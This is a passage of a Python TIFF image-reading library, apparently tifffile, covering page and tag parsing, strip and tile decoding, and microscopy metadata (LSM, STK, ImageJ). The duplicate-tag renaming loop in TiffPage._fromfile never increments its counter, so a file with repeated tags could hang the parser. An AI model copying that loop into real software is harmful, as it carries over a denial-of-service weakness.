except Exception: # io.UnsupportedOperation
return None
@lazyattr
def is_bigtiff(self):
return self.offset_size != 4
@lazyattr
def is_rgb(self):
return all(p.is_rgb for p in self.pages)
@lazyattr
def is_palette(self):
return all(p.is_palette for p in self.pages)
@lazyattr
def is_mdgel(self):
return any(p.is_mdgel for p in self.pages)
@lazyattr
def is_mediacy(self):
return any(p.is_mediacy for p in self.pages)
@lazyattr
def is_stk(self):
return all(p.is_stk for p in self.pages)
@lazyattr
def is_lsm(self):
return self.pages[0].is_lsm
@lazyattr
def is_imagej(self):
return self.pages[0].is_imagej
@lazyattr
def is_micromanager(self):
return self.pages[0].is_micromanager
@lazyattr
def is_nih(self):
return self.pages[0].is_nih
@lazyattr
def is_fluoview(self):
return self.pages[0].is_fluoview
@lazyattr
def is_ome(self):
return self.pages[0].is_ome
class TiffPage(object):
"""A TIFF image file directory (IFD).
Attributes
----------
index : int
Index of page in file.
dtype : str {TIFF_SAMPLE_DTYPES}
Data type of image, colormapped if applicable.
shape : tuple
Dimensions of the image array in TIFF page,
colormapped and with one alpha channel if applicable.
axes : str
Axes label codes:
'X' width, 'Y' height, 'S' sample, 'I' image series|page|plane,
'Z' depth, 'C' color|em-wavelength|channel, 'E' ex-wavelength|lambda,
'T' time, 'R' region|tile, 'A' angle, 'P' phase, 'H' lifetime,
'L' exposure, 'V' event, 'Q' unknown, '_' missing
tags : TiffTags
Dictionary of tags in page.
Tag values are also directly accessible as attributes.
color_map : numpy array
Color look up table, if exists.
cz_lsm_scan_info: Record(dict)
LSM scan info attributes, if exists.
imagej_tags: Record(dict)
Consolidated ImageJ description and metadata tags, if exists.
uic_tags: Record(dict)
Consolidated MetaMorph STK/UIC tags, if exists.
All attributes are read-only.
Notes
-----
The internal, normalized '_shape' attribute is 6 dimensional:
0. number planes (stk)
1. planar samples_per_pixel
2. image_depth Z (sgi)
3. image_length Y
4. image_width X
5. contig samples_per_pixel
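    Examples
    --------
    A usage sketch; 'test.tif' is an assumed file name, so the example is
    skipped in doctests:
    >>> with TiffFile('test.tif') as tif:  # doctest: +SKIP
    ...     page = tif.pages[0]
    ...     image = page.asarray()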
"""
def __init__(self, parent):
"""Initialize instance from file."""
self.parent = parent
self.index = len(parent.pages)
self.shape = self._shape = ()
self.dtype = self._dtype = None
self.axes = ""
self.tags = TiffTags()
self._fromfile()
self._process_tags()
def _fromfile(self):
"""Read TIFF IFD structure and its tags from file.
File cursor must be at storage position of IFD offset and is left at
offset to next IFD.
Raises StopIteration if offset (first bytes read) is 0.
"""
fh = self.parent.filehandle
byteorder = self.parent.byteorder
offset_size = self.parent.offset_size
fmt = {4: 'I', 8: 'Q'}[offset_size]
offset = struct.unpack(byteorder + fmt, fh.read(offset_size))[0]
if not offset:
raise StopIteration()
# read standard tags
tags = self.tags
fh.seek(offset)
fmt, size = {4: ('H', 2), 8: ('Q', 8)}[offset_size]
try:
numtags = struct.unpack(byteorder + fmt, fh.read(size))[0]
except Exception:
warnings.warn("corrupted page list")
raise StopIteration()
tagcode = 0
for _ in range(numtags):
try:
tag = TiffTag(self.parent)
# print(tag)
except TiffTag.Error as e:
warnings.warn(str(e))
continue
if tagcode > tag.code:
# expected for early LSM and tifffile versions
warnings.warn("tags are not ordered by code")
tagcode = tag.code
if tag.name not in tags:
tags[tag.name] = tag
else:
# some files contain multiple IFD with same code
# e.g. MicroManager files contain two image_description
i = 1
while True:
name = "%s_%i" % (tag.name, i)
if name not in tags:
tags[name] = tag
break
pos = fh.tell()
if self.is_lsm or (self.index and self.parent.is_lsm):
# correct non standard LSM bitspersample tags
self.tags['bits_per_sample']._correct_lsm_bitspersample(self)
if self.is_lsm:
# read LSM info subrecords
for name, reader in CZ_LSM_INFO_READERS.items():
try:
offset = self.cz_lsm_info['offset_'+name]
except KeyError:
continue
if offset < 8:
# older LSM revision
continue
fh.seek(offset)
try:
setattr(self, 'cz_lsm_'+name, reader(fh))
except ValueError:
pass
elif self.is_stk and 'uic1tag' in tags and not tags['uic1tag'].value:
# read uic1tag now that plane count is known
uic1tag = tags['uic1tag']
fh.seek(uic1tag.value_offset)
tags['uic1tag'].value = Record(
read_uic1tag(fh, byteorder, uic1tag.dtype, uic1tag.count,
tags['uic2tag'].count))
fh.seek(pos)
def _process_tags(self):
"""Validate standard tags and initialize attributes.
Raise ValueError if tag values are not supported.
"""
tags = self.tags
for code, (name, default, dtype, count, validate) in TIFF_TAGS.items():
if not (name in tags or default is None):
tags[name] = TiffTag(code, dtype=dtype, count=count,
value=default, name=name)
if name in tags and validate:
try:
if tags[name].count == 1:
setattr(self, name, validate[tags[name].value])
else:
setattr(self, name, tuple(
validate[value] for value in tags[name].value))
except KeyError:
raise ValueError("%s.value (%s) not supported" %
(name, tags[name].value))
tag = tags['bits_per_sample']
if tag.count == 1:
self.bits_per_sample = tag.value
else:
# LSM might list more items than samples_per_pixel
value = tag.value[:self.samples_per_pixel]
if any((v-value[0] for v in value)):
self.bits_per_sample = value
else:
self.bits_per_sample = value[0]
tag = tags['sample_format']
if tag.count == 1:
self.sample_format = TIFF_SAMPLE_FORMATS[tag.value]
else:
value = tag.value[:self.samples_per_pixel]
if any((v-value[0] for v in value)):
self.sample_format = [TIFF_SAMPLE_FORMATS[v] for v in value]
else:
self.sample_format = TIFF_SAMPLE_FORMATS[value[0]]
if 'photometric' not in tags:
self.photometric = None
if 'image_depth' not in tags:
self.image_depth = 1
if 'image_length' in tags:
self.strips_per_image = int(math.floor(
float(self.image_length + self.rows_per_strip - 1) /
self.rows_per_strip))
else:
self.strips_per_image = 0
key = (self.sample_format, self.bits_per_sample)
self.dtype = self._dtype = TIFF_SAMPLE_DTYPES.get(key, None)
if 'image_length' not in self.tags or 'image_width' not in self.tags:
# some GEL file pages are missing image data
self.image_length = 0
self.image_width = 0
self.image_depth = 0
self.strip_offsets = 0
self._shape = ()
self.shape = ()
self.axes = ''
if self.is_palette:
self.dtype = self.tags['color_map'].dtype[1]
self.color_map = numpy.array(self.color_map, self.dtype)
dmax = self.color_map.max()
if dmax < 256:
self.dtype = numpy.uint8
self.color_map = self.color_map.astype(self.dtype)
#else:
# self.dtype = numpy.uint8
# self.color_map >>= 8
# self.color_map = self.color_map.astype(self.dtype)
self.color_map.shape = (3, -1)
# determine shape of data
image_length = self.image_length
image_width = self.image_width
image_depth = self.image_depth
samples_per_pixel = self.samples_per_pixel
if self.is_stk:
assert self.image_depth == 1
planes = self.tags['uic2tag'].count
if self.is_contig:
self._shape = (planes, 1, 1, image_length, image_width,
samples_per_pixel)
if samples_per_pixel == 1:
self.shape = (planes, image_length, image_width)
self.axes = 'YX'
else:
self.shape = (planes, image_length, image_width,
samples_per_pixel)
self.axes = 'YXS'
else:
self._shape = (planes, samples_per_pixel, 1, image_length,
image_width, 1)
if samples_per_pixel == 1:
self.shape = (planes, image_length, image_width)
self.axes = 'YX'
else:
self.shape = (planes, samples_per_pixel, image_length,
image_width)
self.axes = 'SYX'
# detect type of series
if planes == 1:
self.shape = self.shape[1:]
elif numpy.all(self.uic2tag.z_distance != 0):
self.axes = 'Z' + self.axes
elif numpy.all(numpy.diff(self.uic2tag.time_created) != 0):
self.axes = 'T' + self.axes
else:
self.axes = 'I' + self.axes
# DISABLED
if self.is_palette:
assert False, "color mapping disabled for stk"
if self.color_map.shape[1] >= 2**self.bits_per_sample:
if image_depth == 1:
self.shape = (3, planes, image_length, image_width)
else:
self.shape = (3, planes, image_depth, image_length,
image_width)
self.axes = 'C' + self.axes
else:
warnings.warn("palette cannot be applied")
self.is_palette = False
elif self.is_palette:
samples = 1
if 'extra_samples' in self.tags:
samples += len(self.extra_samples)
if self.is_contig:
self._shape = (1, 1, image_depth, image_length, image_width,
samples)
else:
self._shape = (1, samples, image_depth, image_length,
image_width, 1)
if self.color_map.shape[1] >= 2**self.bits_per_sample:
if image_depth == 1:
self.shape = (3, image_length, image_width)
self.axes = 'CYX'
else:
self.shape = (3, image_depth, image_length, image_width)
self.axes = 'CZYX'
else:
warnings.warn("palette cannot be applied")
self.is_palette = False
if image_depth == 1:
self.shape = (image_length, image_width)
self.axes = 'YX'
else:
self.shape = (image_depth, image_length, image_width)
self.axes = 'ZYX'
elif self.is_rgb or samples_per_pixel > 1:
if self.is_contig:
self._shape = (1, 1, image_depth, image_length, image_width,
samples_per_pixel)
if image_depth == 1:
self.shape = (image_length, image_width, samples_per_pixel)
self.axes = 'YXS'
else:
self.shape = (image_depth, image_length, image_width,
samples_per_pixel)
self.axes = 'ZYXS'
else:
self._shape = (1, samples_per_pixel, image_depth,
image_length, image_width, 1)
if image_depth == 1:
self.shape = (samples_per_pixel, image_length, image_width)
self.axes = 'SYX'
else:
self.shape = (samples_per_pixel, image_depth,
image_length, image_width)
self.axes = 'SZYX'
if False and self.is_rgb and 'extra_samples' in self.tags:
# DISABLED: only use RGB and first alpha channel if exists
extra_samples = self.extra_samples
if self.tags['extra_samples'].count == 1:
extra_samples = (extra_samples, )
for exs in extra_samples:
if exs in ('unassalpha', 'assocalpha', 'unspecified'):
if self.is_contig:
self.shape = self.shape[:-1] + (4,)
else:
self.shape = (4,) + self.shape[1:]
break
else:
self._shape = (1, 1, image_depth, image_length, image_width, 1)
if image_depth == 1:
self.shape = (image_length, image_width)
self.axes = 'YX'
else:
self.shape = (image_depth, image_length, image_width)
self.axes = 'ZYX'
if not self.compression and 'strip_byte_counts' not in tags:
self.strip_byte_counts = (
product(self.shape) * (self.bits_per_sample // 8), )
assert len(self.shape) == len(self.axes)
def asarray(self, squeeze=True, colormapped=True, rgbonly=False,
scale_mdgel=False, memmap=False, reopen=True):
"""Read image data from file and return as numpy array.
Raise ValueError if format is unsupported.
If any of 'squeeze', 'colormapped', or 'rgbonly' are not the default,
the shape of the returned array might be different from the page shape.
Parameters
----------
squeeze : bool
If True, all length-1 dimensions (except X and Y) are
squeezed out from result.
colormapped : bool
If True, color mapping is applied for palette-indexed images.
rgbonly : bool
If True, return RGB(A) image without additional extra samples.
memmap : bool
If True, use numpy.memmap to read arrays from file if possible.
For use on 64 bit systems and files with few huge contiguous data.
reopen : bool
If True and the parent file handle is closed, the file is
temporarily re-opened (and closed if no exception occurs).
scale_mdgel : bool
If True, MD Gel data will be scaled according to the private
metadata in the second TIFF page. The dtype will be float32.
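        Examples
        --------
        A sketch of typical use; the file name is an assumption, so the
        example is skipped in doctests:
        >>> with TiffFile('test.tif') as tif:  # doctest: +SKIP
        ...     data = tif.pages[0].asarray(memmap=True)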
"""
if not self._shape:
return
if self.dtype is None:
raise ValueError("data type not supported: %s%i" % (
self.sample_format, self.bits_per_sample))
if self.compression not in TIFF_DECOMPESSORS:
raise ValueError("cannot decompress %s" % self.compression)
tag = self.tags['sample_format']
if tag.count != 1 and any((i-tag.value[0] for i in tag.value)):
raise ValueError("sample formats don't match %s" % str(tag.value))
fh = self.parent.filehandle
closed = fh.closed
if closed:
if reopen:
fh.open()
else:
raise IOError("file handle is closed")
dtype = self._dtype
shape = self._shape
image_width = self.image_width
image_length = self.image_length
image_depth = self.image_depth
typecode = self.parent.byteorder + dtype
bits_per_sample = self.bits_per_sample
if self.is_tiled:
if 'tile_offsets' in self.tags:
byte_counts = self.tile_byte_counts
offsets = self.tile_offsets
else:
byte_counts = self.strip_byte_counts
offsets = self.strip_offsets
tile_width = self.tile_width
tile_length = self.tile_length
tile_depth = self.tile_depth if 'tile_depth' in self.tags else 1
tw = (image_width + tile_width - 1) // tile_width
tl = (image_length + tile_length - 1) // tile_length
td = (image_depth + tile_depth - 1) // tile_depth
shape = (shape[0], shape[1],
td*tile_depth, tl*tile_length, tw*tile_width, shape[-1])
tile_shape = (tile_depth, tile_length, tile_width, shape[-1])
runlen = tile_width
else:
byte_counts = self.strip_byte_counts
offsets = self.strip_offsets
runlen = image_width
if any(o < 2 for o in offsets):
raise ValueError("corrupted page")
if memmap and self._is_memmappable(rgbonly, colormapped):
result = fh.memmap_array(typecode, shape, offset=offsets[0])
elif self.is_contiguous:
fh.seek(offsets[0])
result = fh.read_array(typecode, product(shape))
result = result.astype('=' + dtype)
else:
if self.is_contig:
runlen *= self.samples_per_pixel
if bits_per_sample in (8, 16, 32, 64, 128):
if (bits_per_sample * runlen) % 8:
raise ValueError("data and sample size mismatch")
def unpack(x):
try:
return numpy.fromstring(x, typecode)
except ValueError as e:
# strips may be missing EOI
warnings.warn("unpack: %s" % e)
xlen = ((len(x) // (bits_per_sample // 8))
* (bits_per_sample // 8))
return numpy.fromstring(x[:xlen], typecode)
elif isinstance(bits_per_sample, tuple):
def unpack(x):
return unpackrgb(x, typecode, bits_per_sample)
else:
def unpack(x):
return unpackints(x, typecode, bits_per_sample, runlen)
decompress = TIFF_DECOMPESSORS[self.compression]
if self.compression == 'jpeg':
table = self.jpeg_tables if 'jpeg_tables' in self.tags else b''
decompress = lambda x: decodejpg(x, table, self.photometric)
if self.is_tiled:
result = numpy.empty(shape, dtype)
tw, tl, td, pl = 0, 0, 0, 0
for offset, bytecount in zip(offsets, byte_counts):
fh.seek(offset)
tile = unpack(decompress(fh.read(bytecount)))
tile.shape = tile_shape
if self.predictor == 'horizontal':
numpy.cumsum(tile, axis=-2, dtype=dtype, out=tile)
result[0, pl, td:td+tile_depth,
tl:tl+tile_length, tw:tw+tile_width, :] = tile
del tile
tw += tile_width
if tw >= shape[4]:
tw, tl = 0, tl + tile_length
if tl >= shape[3]:
tl, td = 0, td + tile_depth
if td >= shape[2]:
td, pl = 0, pl + 1
result = result[...,
:image_depth, :image_length, :image_width, :]
else:
strip_size = (self.rows_per_strip * self.image_width *
self.samples_per_pixel)
result = numpy.empty(shape, dtype).reshape(-1)
index = 0
for offset, bytecount in zip(offsets, byte_counts):
fh.seek(offset)
strip = fh.read(bytecount)
strip = decompress(strip)
strip = unpack(strip)
size = min(result.size, strip.size, strip_size,
result.size - index)
result[index:index+size] = strip[:size]
del strip
index += size
result.shape = self._shape
if self.predictor == 'horizontal' and not (self.is_tiled and not
self.is_contiguous):
# work around bug in LSM510 software
if not (self.parent.is_lsm and not self.compression):
numpy.cumsum(result, axis=-2, dtype=dtype, out=result)
if colormapped and self.is_palette:
if self.color_map.shape[1] >= 2**bits_per_sample:
# FluoView and LSM might fail here
result = numpy.take(self.color_map,
result[:, 0, :, :, :, 0], axis=1)
elif rgbonly and self.is_rgb and 'extra_samples' in self.tags:
# return only RGB and first alpha channel if exists
extra_samples = self.extra_samples
if self.tags['extra_samples'].count == 1:
extra_samples = (extra_samples, )
for i, exs in enumerate(extra_samples):
if exs in ('unassalpha', 'assocalpha', 'unspecified'):
if self.is_contig:
result = result[..., [0, 1, 2, 3+i]]
else:
result = result[:, [0, 1, 2, 3+i]]
break
else:
if self.is_contig:
result = result[..., :3]
else:
result = result[:, :3]
if squeeze:
try:
result.shape = self.shape
except ValueError:
warnings.warn("failed to reshape from %s to %s" % (
str(result.shape), str(self.shape)))
if scale_mdgel and self.parent.is_mdgel:
# MD Gel stores private metadata in the second page
tags = self.parent.pages[1]
if tags.md_file_tag in (2, 128):
scale = tags.md_scale_pixel
scale = scale[0] / scale[1] # rational
result = result.astype('float32')
if tags.md_file_tag == 2:
                    result **= 2  # square root data format
result *= scale
if closed:
# TODO: file remains open if an exception occurred above
fh.close()
return result
def _is_memmappable(self, rgbonly, colormapped):
"""Return if image data in file can be memory mapped."""
if not self.parent.filehandle.is_file or not self.is_contiguous:
return False
return not (self.predictor or
(rgbonly and 'extra_samples' in self.tags) or
(colormapped and self.is_palette) or
({'big': '>', 'little': '<'}[sys.byteorder] !=
self.parent.byteorder))
@lazyattr
def is_contiguous(self):
"""Return offset and size of contiguous data, else None.
Excludes prediction and colormapping.
"""
if self.compression or self.bits_per_sample not in (8, 16, 32, 64):
return
if self.is_tiled:
if (self.image_width != self.tile_width or
self.image_length % self.tile_length or
self.tile_width % 16 or self.tile_length % 16):
return
if ('image_depth' in self.tags and 'tile_depth' in self.tags and
(self.image_length != self.tile_length or
self.image_depth % self.tile_depth)):
return
offsets = self.tile_offsets
byte_counts = self.tile_byte_counts
else:
offsets = self.strip_offsets
byte_counts = self.strip_byte_counts
if len(offsets) == 1:
return offsets[0], byte_counts[0]
if self.is_stk or all(offsets[i] + byte_counts[i] == offsets[i+1]
or byte_counts[i+1] == 0 # no data/ignore offset
for i in range(len(offsets)-1)):
return offsets[0], sum(byte_counts)
def __str__(self):
"""Return string containing information about page."""
s = ', '.join(s for s in (
' x '.join(str(i) for i in self.shape),
str(numpy.dtype(self.dtype)),
'%s bit' % str(self.bits_per_sample),
self.photometric if 'photometric' in self.tags else '',
self.compression if self.compression else 'raw',
'|'.join(t[3:] for t in (
'is_stk', 'is_lsm', 'is_nih', 'is_ome', 'is_imagej',
'is_micromanager', 'is_fluoview', 'is_mdgel', 'is_mediacy',
'is_sgi', 'is_reduced', 'is_tiled',
'is_contiguous') if getattr(self, t))) if s)
return "Page %i: %s" % (self.index, s)
def __getattr__(self, name):
"""Return tag value."""
if name in self.tags:
value = self.tags[name].value
setattr(self, name, value)
return value
raise AttributeError(name)
@lazyattr
def uic_tags(self):
"""Consolidate UIC tags."""
if not self.is_stk:
raise AttributeError("uic_tags")
tags = self.tags
result = Record()
result.number_planes = tags['uic2tag'].count
if 'image_description' in tags:
result.plane_descriptions = self.image_description.split(b'\x00')
if 'uic1tag' in tags:
result.update(tags['uic1tag'].value)
if 'uic3tag' in tags:
result.update(tags['uic3tag'].value) # wavelengths
if 'uic4tag' in tags:
result.update(tags['uic4tag'].value) # override uic1 tags
uic2tag = tags['uic2tag'].value
result.z_distance = uic2tag.z_distance
result.time_created = uic2tag.time_created
result.time_modified = uic2tag.time_modified
try:
result.datetime_created = [
julian_datetime(*dt) for dt in
zip(uic2tag.date_created, uic2tag.time_created)]
result.datetime_modified = [
julian_datetime(*dt) for dt in
zip(uic2tag.date_modified, uic2tag.time_modified)]
except ValueError as e:
warnings.warn("uic_tags: %s" % e)
return result
@lazyattr
def imagej_tags(self):
"""Consolidate ImageJ metadata."""
if not self.is_imagej:
raise AttributeError("imagej_tags")
tags = self.tags
if 'image_description_1' in tags:
# MicroManager
result = imagej_description(tags['image_description_1'].value)
else:
result = imagej_description(tags['image_description'].value)
if 'imagej_metadata' in tags:
try:
result.update(imagej_metadata(
tags['imagej_metadata'].value,
tags['imagej_byte_counts'].value,
self.parent.byteorder))
except Exception as e:
warnings.warn(str(e))
return Record(result)
@lazyattr
def is_rgb(self):
"""True if page contains a RGB image."""
return ('photometric' in self.tags and
self.tags['photometric'].value == 2)
@lazyattr
def is_contig(self):
"""True if page contains a contiguous image."""
return ('planar_configuration' in self.tags and
self.tags['planar_configuration'].value == 1)
@lazyattr
def is_palette(self):
"""True if page contains a palette-colored image and not OME or STK."""
try:
# turn off color mapping for OME-TIFF and STK
if self.is_stk or self.is_ome or self.parent.is_ome:
return False
except IndexError:
pass # OME-XML not found in first page
return ('photometric' in self.tags and
self.tags['photometric'].value == 3)
@lazyattr
def is_tiled(self):
"""True if page contains tiled image."""
return 'tile_width' in self.tags
@lazyattr
def is_reduced(self):
"""True if page is a reduced image of another image."""
return bool(self.tags['new_subfile_type'].value & 1)
@lazyattr
def is_mdgel(self):
"""True if page contains md_file_tag tag."""
return 'md_file_tag' in self.tags
@lazyattr
def is_mediacy(self):
"""True if page contains Media Cybernetics Id tag."""
return ('mc_id' in self.tags and
self.tags['mc_id'].value.startswith(b'MC TIFF'))
@lazyattr
def is_stk(self):
"""True if page contains UIC2Tag tag."""
return 'uic2tag' in self.tags
@lazyattr
def is_lsm(self):
"""True if page contains LSM CZ_LSM_INFO tag."""
return 'cz_lsm_info' in self.tags
@lazyattr
def is_fluoview(self):
"""True if page contains FluoView MM_STAMP tag."""
return 'mm_stamp' in self.tags
@lazyattr
def is_nih(self):
"""True if page contains NIH image header."""
return 'nih_image_header' in self.tags
@lazyattr
def is_sgi(self):
"""True if page contains SGI image and tile depth tags."""
return 'image_depth' in self.tags and 'tile_depth' in self.tags
@lazyattr
def is_ome(self):
"""True if page contains OME-XML in image_description tag."""
return ('image_description' in self.tags and self.tags[
'image_description'].value.startswith(b'<?xml version='))
@lazyattr
def is_shaped(self):
"""True if page contains shape in image_description tag."""
return ('image_description' in self.tags and self.tags[
'image_description'].value.startswith(b'shape=('))
@lazyattr
def is_imagej(self):
"""True if page contains ImageJ description."""
return (
('image_description' in self.tags and
self.tags['image_description'].value.startswith(b'ImageJ=')) or
('image_description_1' in self.tags and # Micromanager
self.tags['image_description_1'].value.startswith(b'ImageJ=')))
@lazyattr
def is_micromanager(self):
"""True if page contains Micro-Manager metadata."""
return 'micromanager_metadata' in self.tags
class TiffTag(object):
"""A TIFF tag structure.
Attributes
----------
name : string
Attribute name of tag.
code : int
Decimal code of tag.
dtype : str
Datatype of tag data. One of TIFF_DATA_TYPES.
count : int
Number of values.
value : various types
Tag data as Python object.
value_offset : int
Location of value in file, if any.
All attributes are read-only.
"""
__slots__ = ('code', 'name', 'count', 'dtype', 'value', 'value_offset',
'_offset', '_value', '_type')
class Error(Exception):
pass
def __init__(self, arg, **kwargs):
"""Initialize instance from file or arguments."""
self._offset = None
if hasattr(arg, '_fh'):
self._fromfile(arg, **kwargs)
else:
self._fromdata(arg, **kwargs)
def _fromdata(self, code, dtype, count, value, name=None):
"""Initialize instance from arguments."""
self.code = int(code)
self.name = name if name else str(code)
self.dtype = TIFF_DATA_TYPES[dtype]
self.count = int(count)
self.value = value
self._value = value
self._type = dtype
def _fromfile(self, parent):
"""Read tag structure from open file. Advance file cursor."""
fh = parent.filehandle
byteorder = parent.byteorder
self._offset = fh.tell()
self.value_offset = self._offset + parent.offset_size + 4
fmt, size = {4: ('HHI4s', 12), 8: ('HHQ8s', 20)}[parent.offset_size]
data = fh.read(size)
code, dtype = struct.unpack(byteorder + fmt[:2], data[:4])
count, value = struct.unpack(byteorder + fmt[2:], data[4:])
self._value = value
self._type = dtype
if code in TIFF_TAGS:
name = TIFF_TAGS[code][0]
elif code in CUSTOM_TAGS:
name = CUSTOM_TAGS[code][0]
else:
name = str(code)
try:
dtype = TIFF_DATA_TYPES[self._type]
except KeyError:
raise TiffTag.Error("unknown tag data type %i" % self._type)
fmt = '%s%i%s' % (byteorder, count*int(dtype[0]), dtype[1])
size = struct.calcsize(fmt)
if size > parent.offset_size or code in CUSTOM_TAGS:
pos = fh.tell()
tof = {4: 'I', 8: 'Q'}[parent.offset_size]
self.value_offset = offset = struct.unpack(byteorder+tof, value)[0]
if offset < 0 or offset > parent.filehandle.size:
raise TiffTag.Error("corrupt file - invalid tag value offset")
elif offset < 4:
raise TiffTag.Error("corrupt value offset for tag %i" % code)
fh.seek(offset)
if code in CUSTOM_TAGS:
readfunc = CUSTOM_TAGS[code][1]
value = readfunc(fh, byteorder, dtype, count)
if isinstance(value, dict): # numpy.core.records.record
value = Record(value)
elif code in TIFF_TAGS or dtype[-1] == 's':
value = struct.unpack(fmt, fh.read(size))
else:
value = read_numpy(fh, byteorder, dtype, count)
fh.seek(pos)
else:
value = struct.unpack(fmt, value[:size])
if code not in CUSTOM_TAGS and code not in (273, 279, 324, 325):
# scalar value if not strip/tile offsets/byte_counts
if len(value) == 1:
value = value[0]
if (dtype.endswith('s') and isinstance(value, bytes)
and self._type != 7):
# TIFF ASCII fields can contain multiple strings,
# each terminated with a NUL
value = stripascii(value)
self.code = code
self.name = name
self.dtype = dtype
self.count = count
self.value = value
def _correct_lsm_bitspersample(self, parent):
"""Correct LSM bitspersample tag.
Old LSM writers may use a separate region for two 16-bit values,
although they fit into the tag value element of the tag.
"""
if self.code == 258 and self.count == 2:
# TODO: test this. Need example file.
warnings.warn("correcting LSM bitspersample tag")
fh = parent.filehandle
tof = {4: '<I', 8: '<Q'}[parent.offset_size]
self.value_offset = struct.unpack(tof, self._value)[0]
fh.seek(self.value_offset)
self.value = struct.unpack("<HH", fh.read(4))
def as_str(self):
"""Return value as human readable string."""
return ((str(self.value).split('\n', 1)[0]) if (self._type != 7)
else '<undefined>')
def __str__(self):
"""Return string containing information about tag."""
return ' '.join(str(getattr(self, s)) for s in self.__slots__)
class TiffSequence(object):
"""Sequence of image files.
The data shape and dtype of all files must match.
    Attributes
----------
files : list
List of file names.
shape : tuple
Shape of image sequence.
axes : str
Labels of axes in shape.
Examples
--------
>>> tifs = TiffSequence("test.oif.files/*.tif") # doctest: +SKIP
>>> tifs.shape, tifs.axes # doctest: +SKIP
((2, 100), 'CT')
>>> data = tifs.asarray() # doctest: +SKIP
>>> data.shape # doctest: +SKIP
(2, 100, 256, 256)
"""
_patterns = {
'axes': r"""
# matches Olympus OIF and Leica TIFF series
_?(?:(q|l|p|a|c|t|x|y|z|ch|tp)(\d{1,4}))
_?(?:(q|l|p|a|c|t|x|y|z|ch|tp)(\d{1,4}))?
_?(?:(q|l|p|a|c|t|x|y|z|ch|tp)(\d{1,4}))?
_?(?:(q|l|p|a|c|t|x|y|z|ch|tp)(\d{1,4}))?
_?(?:(q|l|p|a|c|t|x|y|z|ch|tp)(\d{1,4}))?
_?(?:(q|l|p|a|c|t|x|y|z|ch|tp)(\d{1,4}))?
_?(?:(q|l|p|a|c|t|x|y|z|ch|tp)(\d{1,4}))?
"""}
class ParseError(Exception):
pass
def __init__(self, files, imread=TiffFile, pattern='axes',
*args, **kwargs):
"""Initialize instance from multiple files.
Parameters
----------
files : str, or sequence of str
Glob pattern or sequence of file names.
imread : function or class
Image read function or class with asarray function returning numpy
array from single file.
pattern : str
Regular expression pattern that matches axes names and sequence
indices in file names.
By default this matches Olympus OIF and Leica TIFF series.
"""
if isinstance(files, basestring):
files = natural_sorted(glob.glob(files))
files = list(files)
if not files:
raise ValueError("no files found")
#if not os.path.isfile(files[0]):
# raise ValueError("file not found")
self.files = files
if hasattr(imread, 'asarray'):
# redefine imread
_imread = imread
def imread(fname, *args, **kwargs):
with _imread(fname) as im:
return im.asarray(*args, **kwargs)
self.imread = imread
self.pattern = self._patterns.get(pattern, pattern)
try:
self._parse()
if not self.axes:
self.axes = 'I'
except self.ParseError:
self.axes = 'I'
self.shape = (len(files),)
self._start_index = (0,)
self._indices = tuple((i,) for i in range(len(files)))
def __str__(self):
"""Return string with information about image sequence."""
return "\n".join([
self.files[0],
'* files: %i' % len(self.files),
'* axes: %s' % self.axes,
'* shape: %s' % str(self.shape)])
def __len__(self):
return len(self.files)
def __enter__(self):
return self
def __exit__(self, exc_type, exc_value, traceback):
self.close()
def close(self):
pass
def asarray(self, memmap=False, *args, **kwargs):
"""Read image data from all files and return as single numpy array.
If memmap is True, return an array stored in a binary file on disk.
The args and kwargs parameters are passed to the imread function.
Raise IndexError or ValueError if image shapes don't match.
"""
im = self.imread(self.files[0], *args, **kwargs)
shape = self.shape + im.shape
if memmap:
with tempfile.NamedTemporaryFile() as fh:
result = numpy.memmap(fh, dtype=im.dtype, shape=shape)
else:
result = numpy.zeros(shape, dtype=im.dtype)
result = result.reshape(-1, *im.shape)
for index, fname in zip(self._indices, self.files):
index = [i-j for i, j in zip(index, self._start_index)]
index = numpy.ravel_multi_index(index, self.shape)
im = self.imread(fname, *args, **kwargs)
result[index] = im
result.shape = shape
return result
def _parse(self):
"""Get axes and shape from file names."""
if not self.pattern:
raise self.ParseError("invalid pattern")
pattern = re.compile(self.pattern, re.IGNORECASE | re.VERBOSE)
matches = pattern.findall(self.files[0])
if not matches:
raise self.ParseError("pattern doesn't match file names")
matches = matches[-1]
if len(matches) % 2:
raise self.ParseError("pattern doesn't match axis name and index")
axes = ''.join(m for m in matches[::2] if m)
if not axes:
raise self.ParseError("pattern doesn't match file names")
indices = []
for fname in self.files:
matches = pattern.findall(fname)[-1]
if axes != ''.join(m for m in matches[::2] if m):
raise ValueError("axes don't match within the image sequence")
indices.append([int(m) for m in matches[1::2] if m])
shape = tuple(numpy.max(indices, axis=0))
start_index = tuple(numpy.min(indices, axis=0))
shape = tuple(i-j+1 for i, j in zip(shape, start_index))
if product(shape) != len(self.files):
warnings.warn("files are missing. Missing data are zeroed")
self.axes = axes.upper()
self.shape = shape
self._indices = indices
self._start_index = start_index
class Record(dict):
"""Dictionary with attribute access.
Can also be initialized with numpy.core.records.record.
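    Examples
    --------
    >>> r = Record(shape=(2, 3), axes='YX')
    >>> r.axes
    'YX'
    >>> r['shape']
    (2, 3)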
"""
__slots__ = ()
def __init__(self, arg=None, **kwargs):
if kwargs:
arg = kwargs
elif arg is None:
arg = {}
try:
dict.__init__(self, arg)
except (TypeError, ValueError):
for i, name in enumerate(arg.dtype.names):
v = arg[i]
self[name] = v if v.dtype.char != 'S' else stripnull(v)
def __getattr__(self, name):
return self[name]
def __setattr__(self, name, value):
self.__setitem__(name, value)
def __str__(self):
"""Pretty print Record."""
s = []
lists = []
for k in sorted(self):
try:
if k.startswith('_'): # does not work with byte
continue
except AttributeError:
pass
v = self[k]
if isinstance(v, (list, tuple)) and len(v):
if isinstance(v[0], Record):
lists.append((k, v))
continue
elif isinstance(v[0], TiffPage):
v = [i.index for i in v if i]
s.append(
("* %s: %s" % (k, str(v))).split("\n", 1)[0]
[:PRINT_LINE_LEN].rstrip())
for k, v in lists:
l = []
for i, w in enumerate(v):
l.append("* %s[%i]\n %s" % (k, i,
str(w).replace("\n", "\n ")))
s.append('\n'.join(l))
return '\n'.join(s)
class TiffTags(Record):
"""Dictionary of TiffTag with attribute access."""
def __str__(self):
"""Return string with information about all tags."""
s = []
for tag in sorted(self.values(), key=lambda x: x.code):
typecode = "%i%s" % (tag.count * int(tag.dtype[0]), tag.dtype[1])
line = "* %i %s (%s) %s" % (
tag.code, tag.name, typecode, tag.as_str())
s.append(line[:PRINT_LINE_LEN].lstrip())
return '\n'.join(s)
class FileHandle(object):
"""Binary file handle.
* Handle embedded files (for CZI within CZI files).
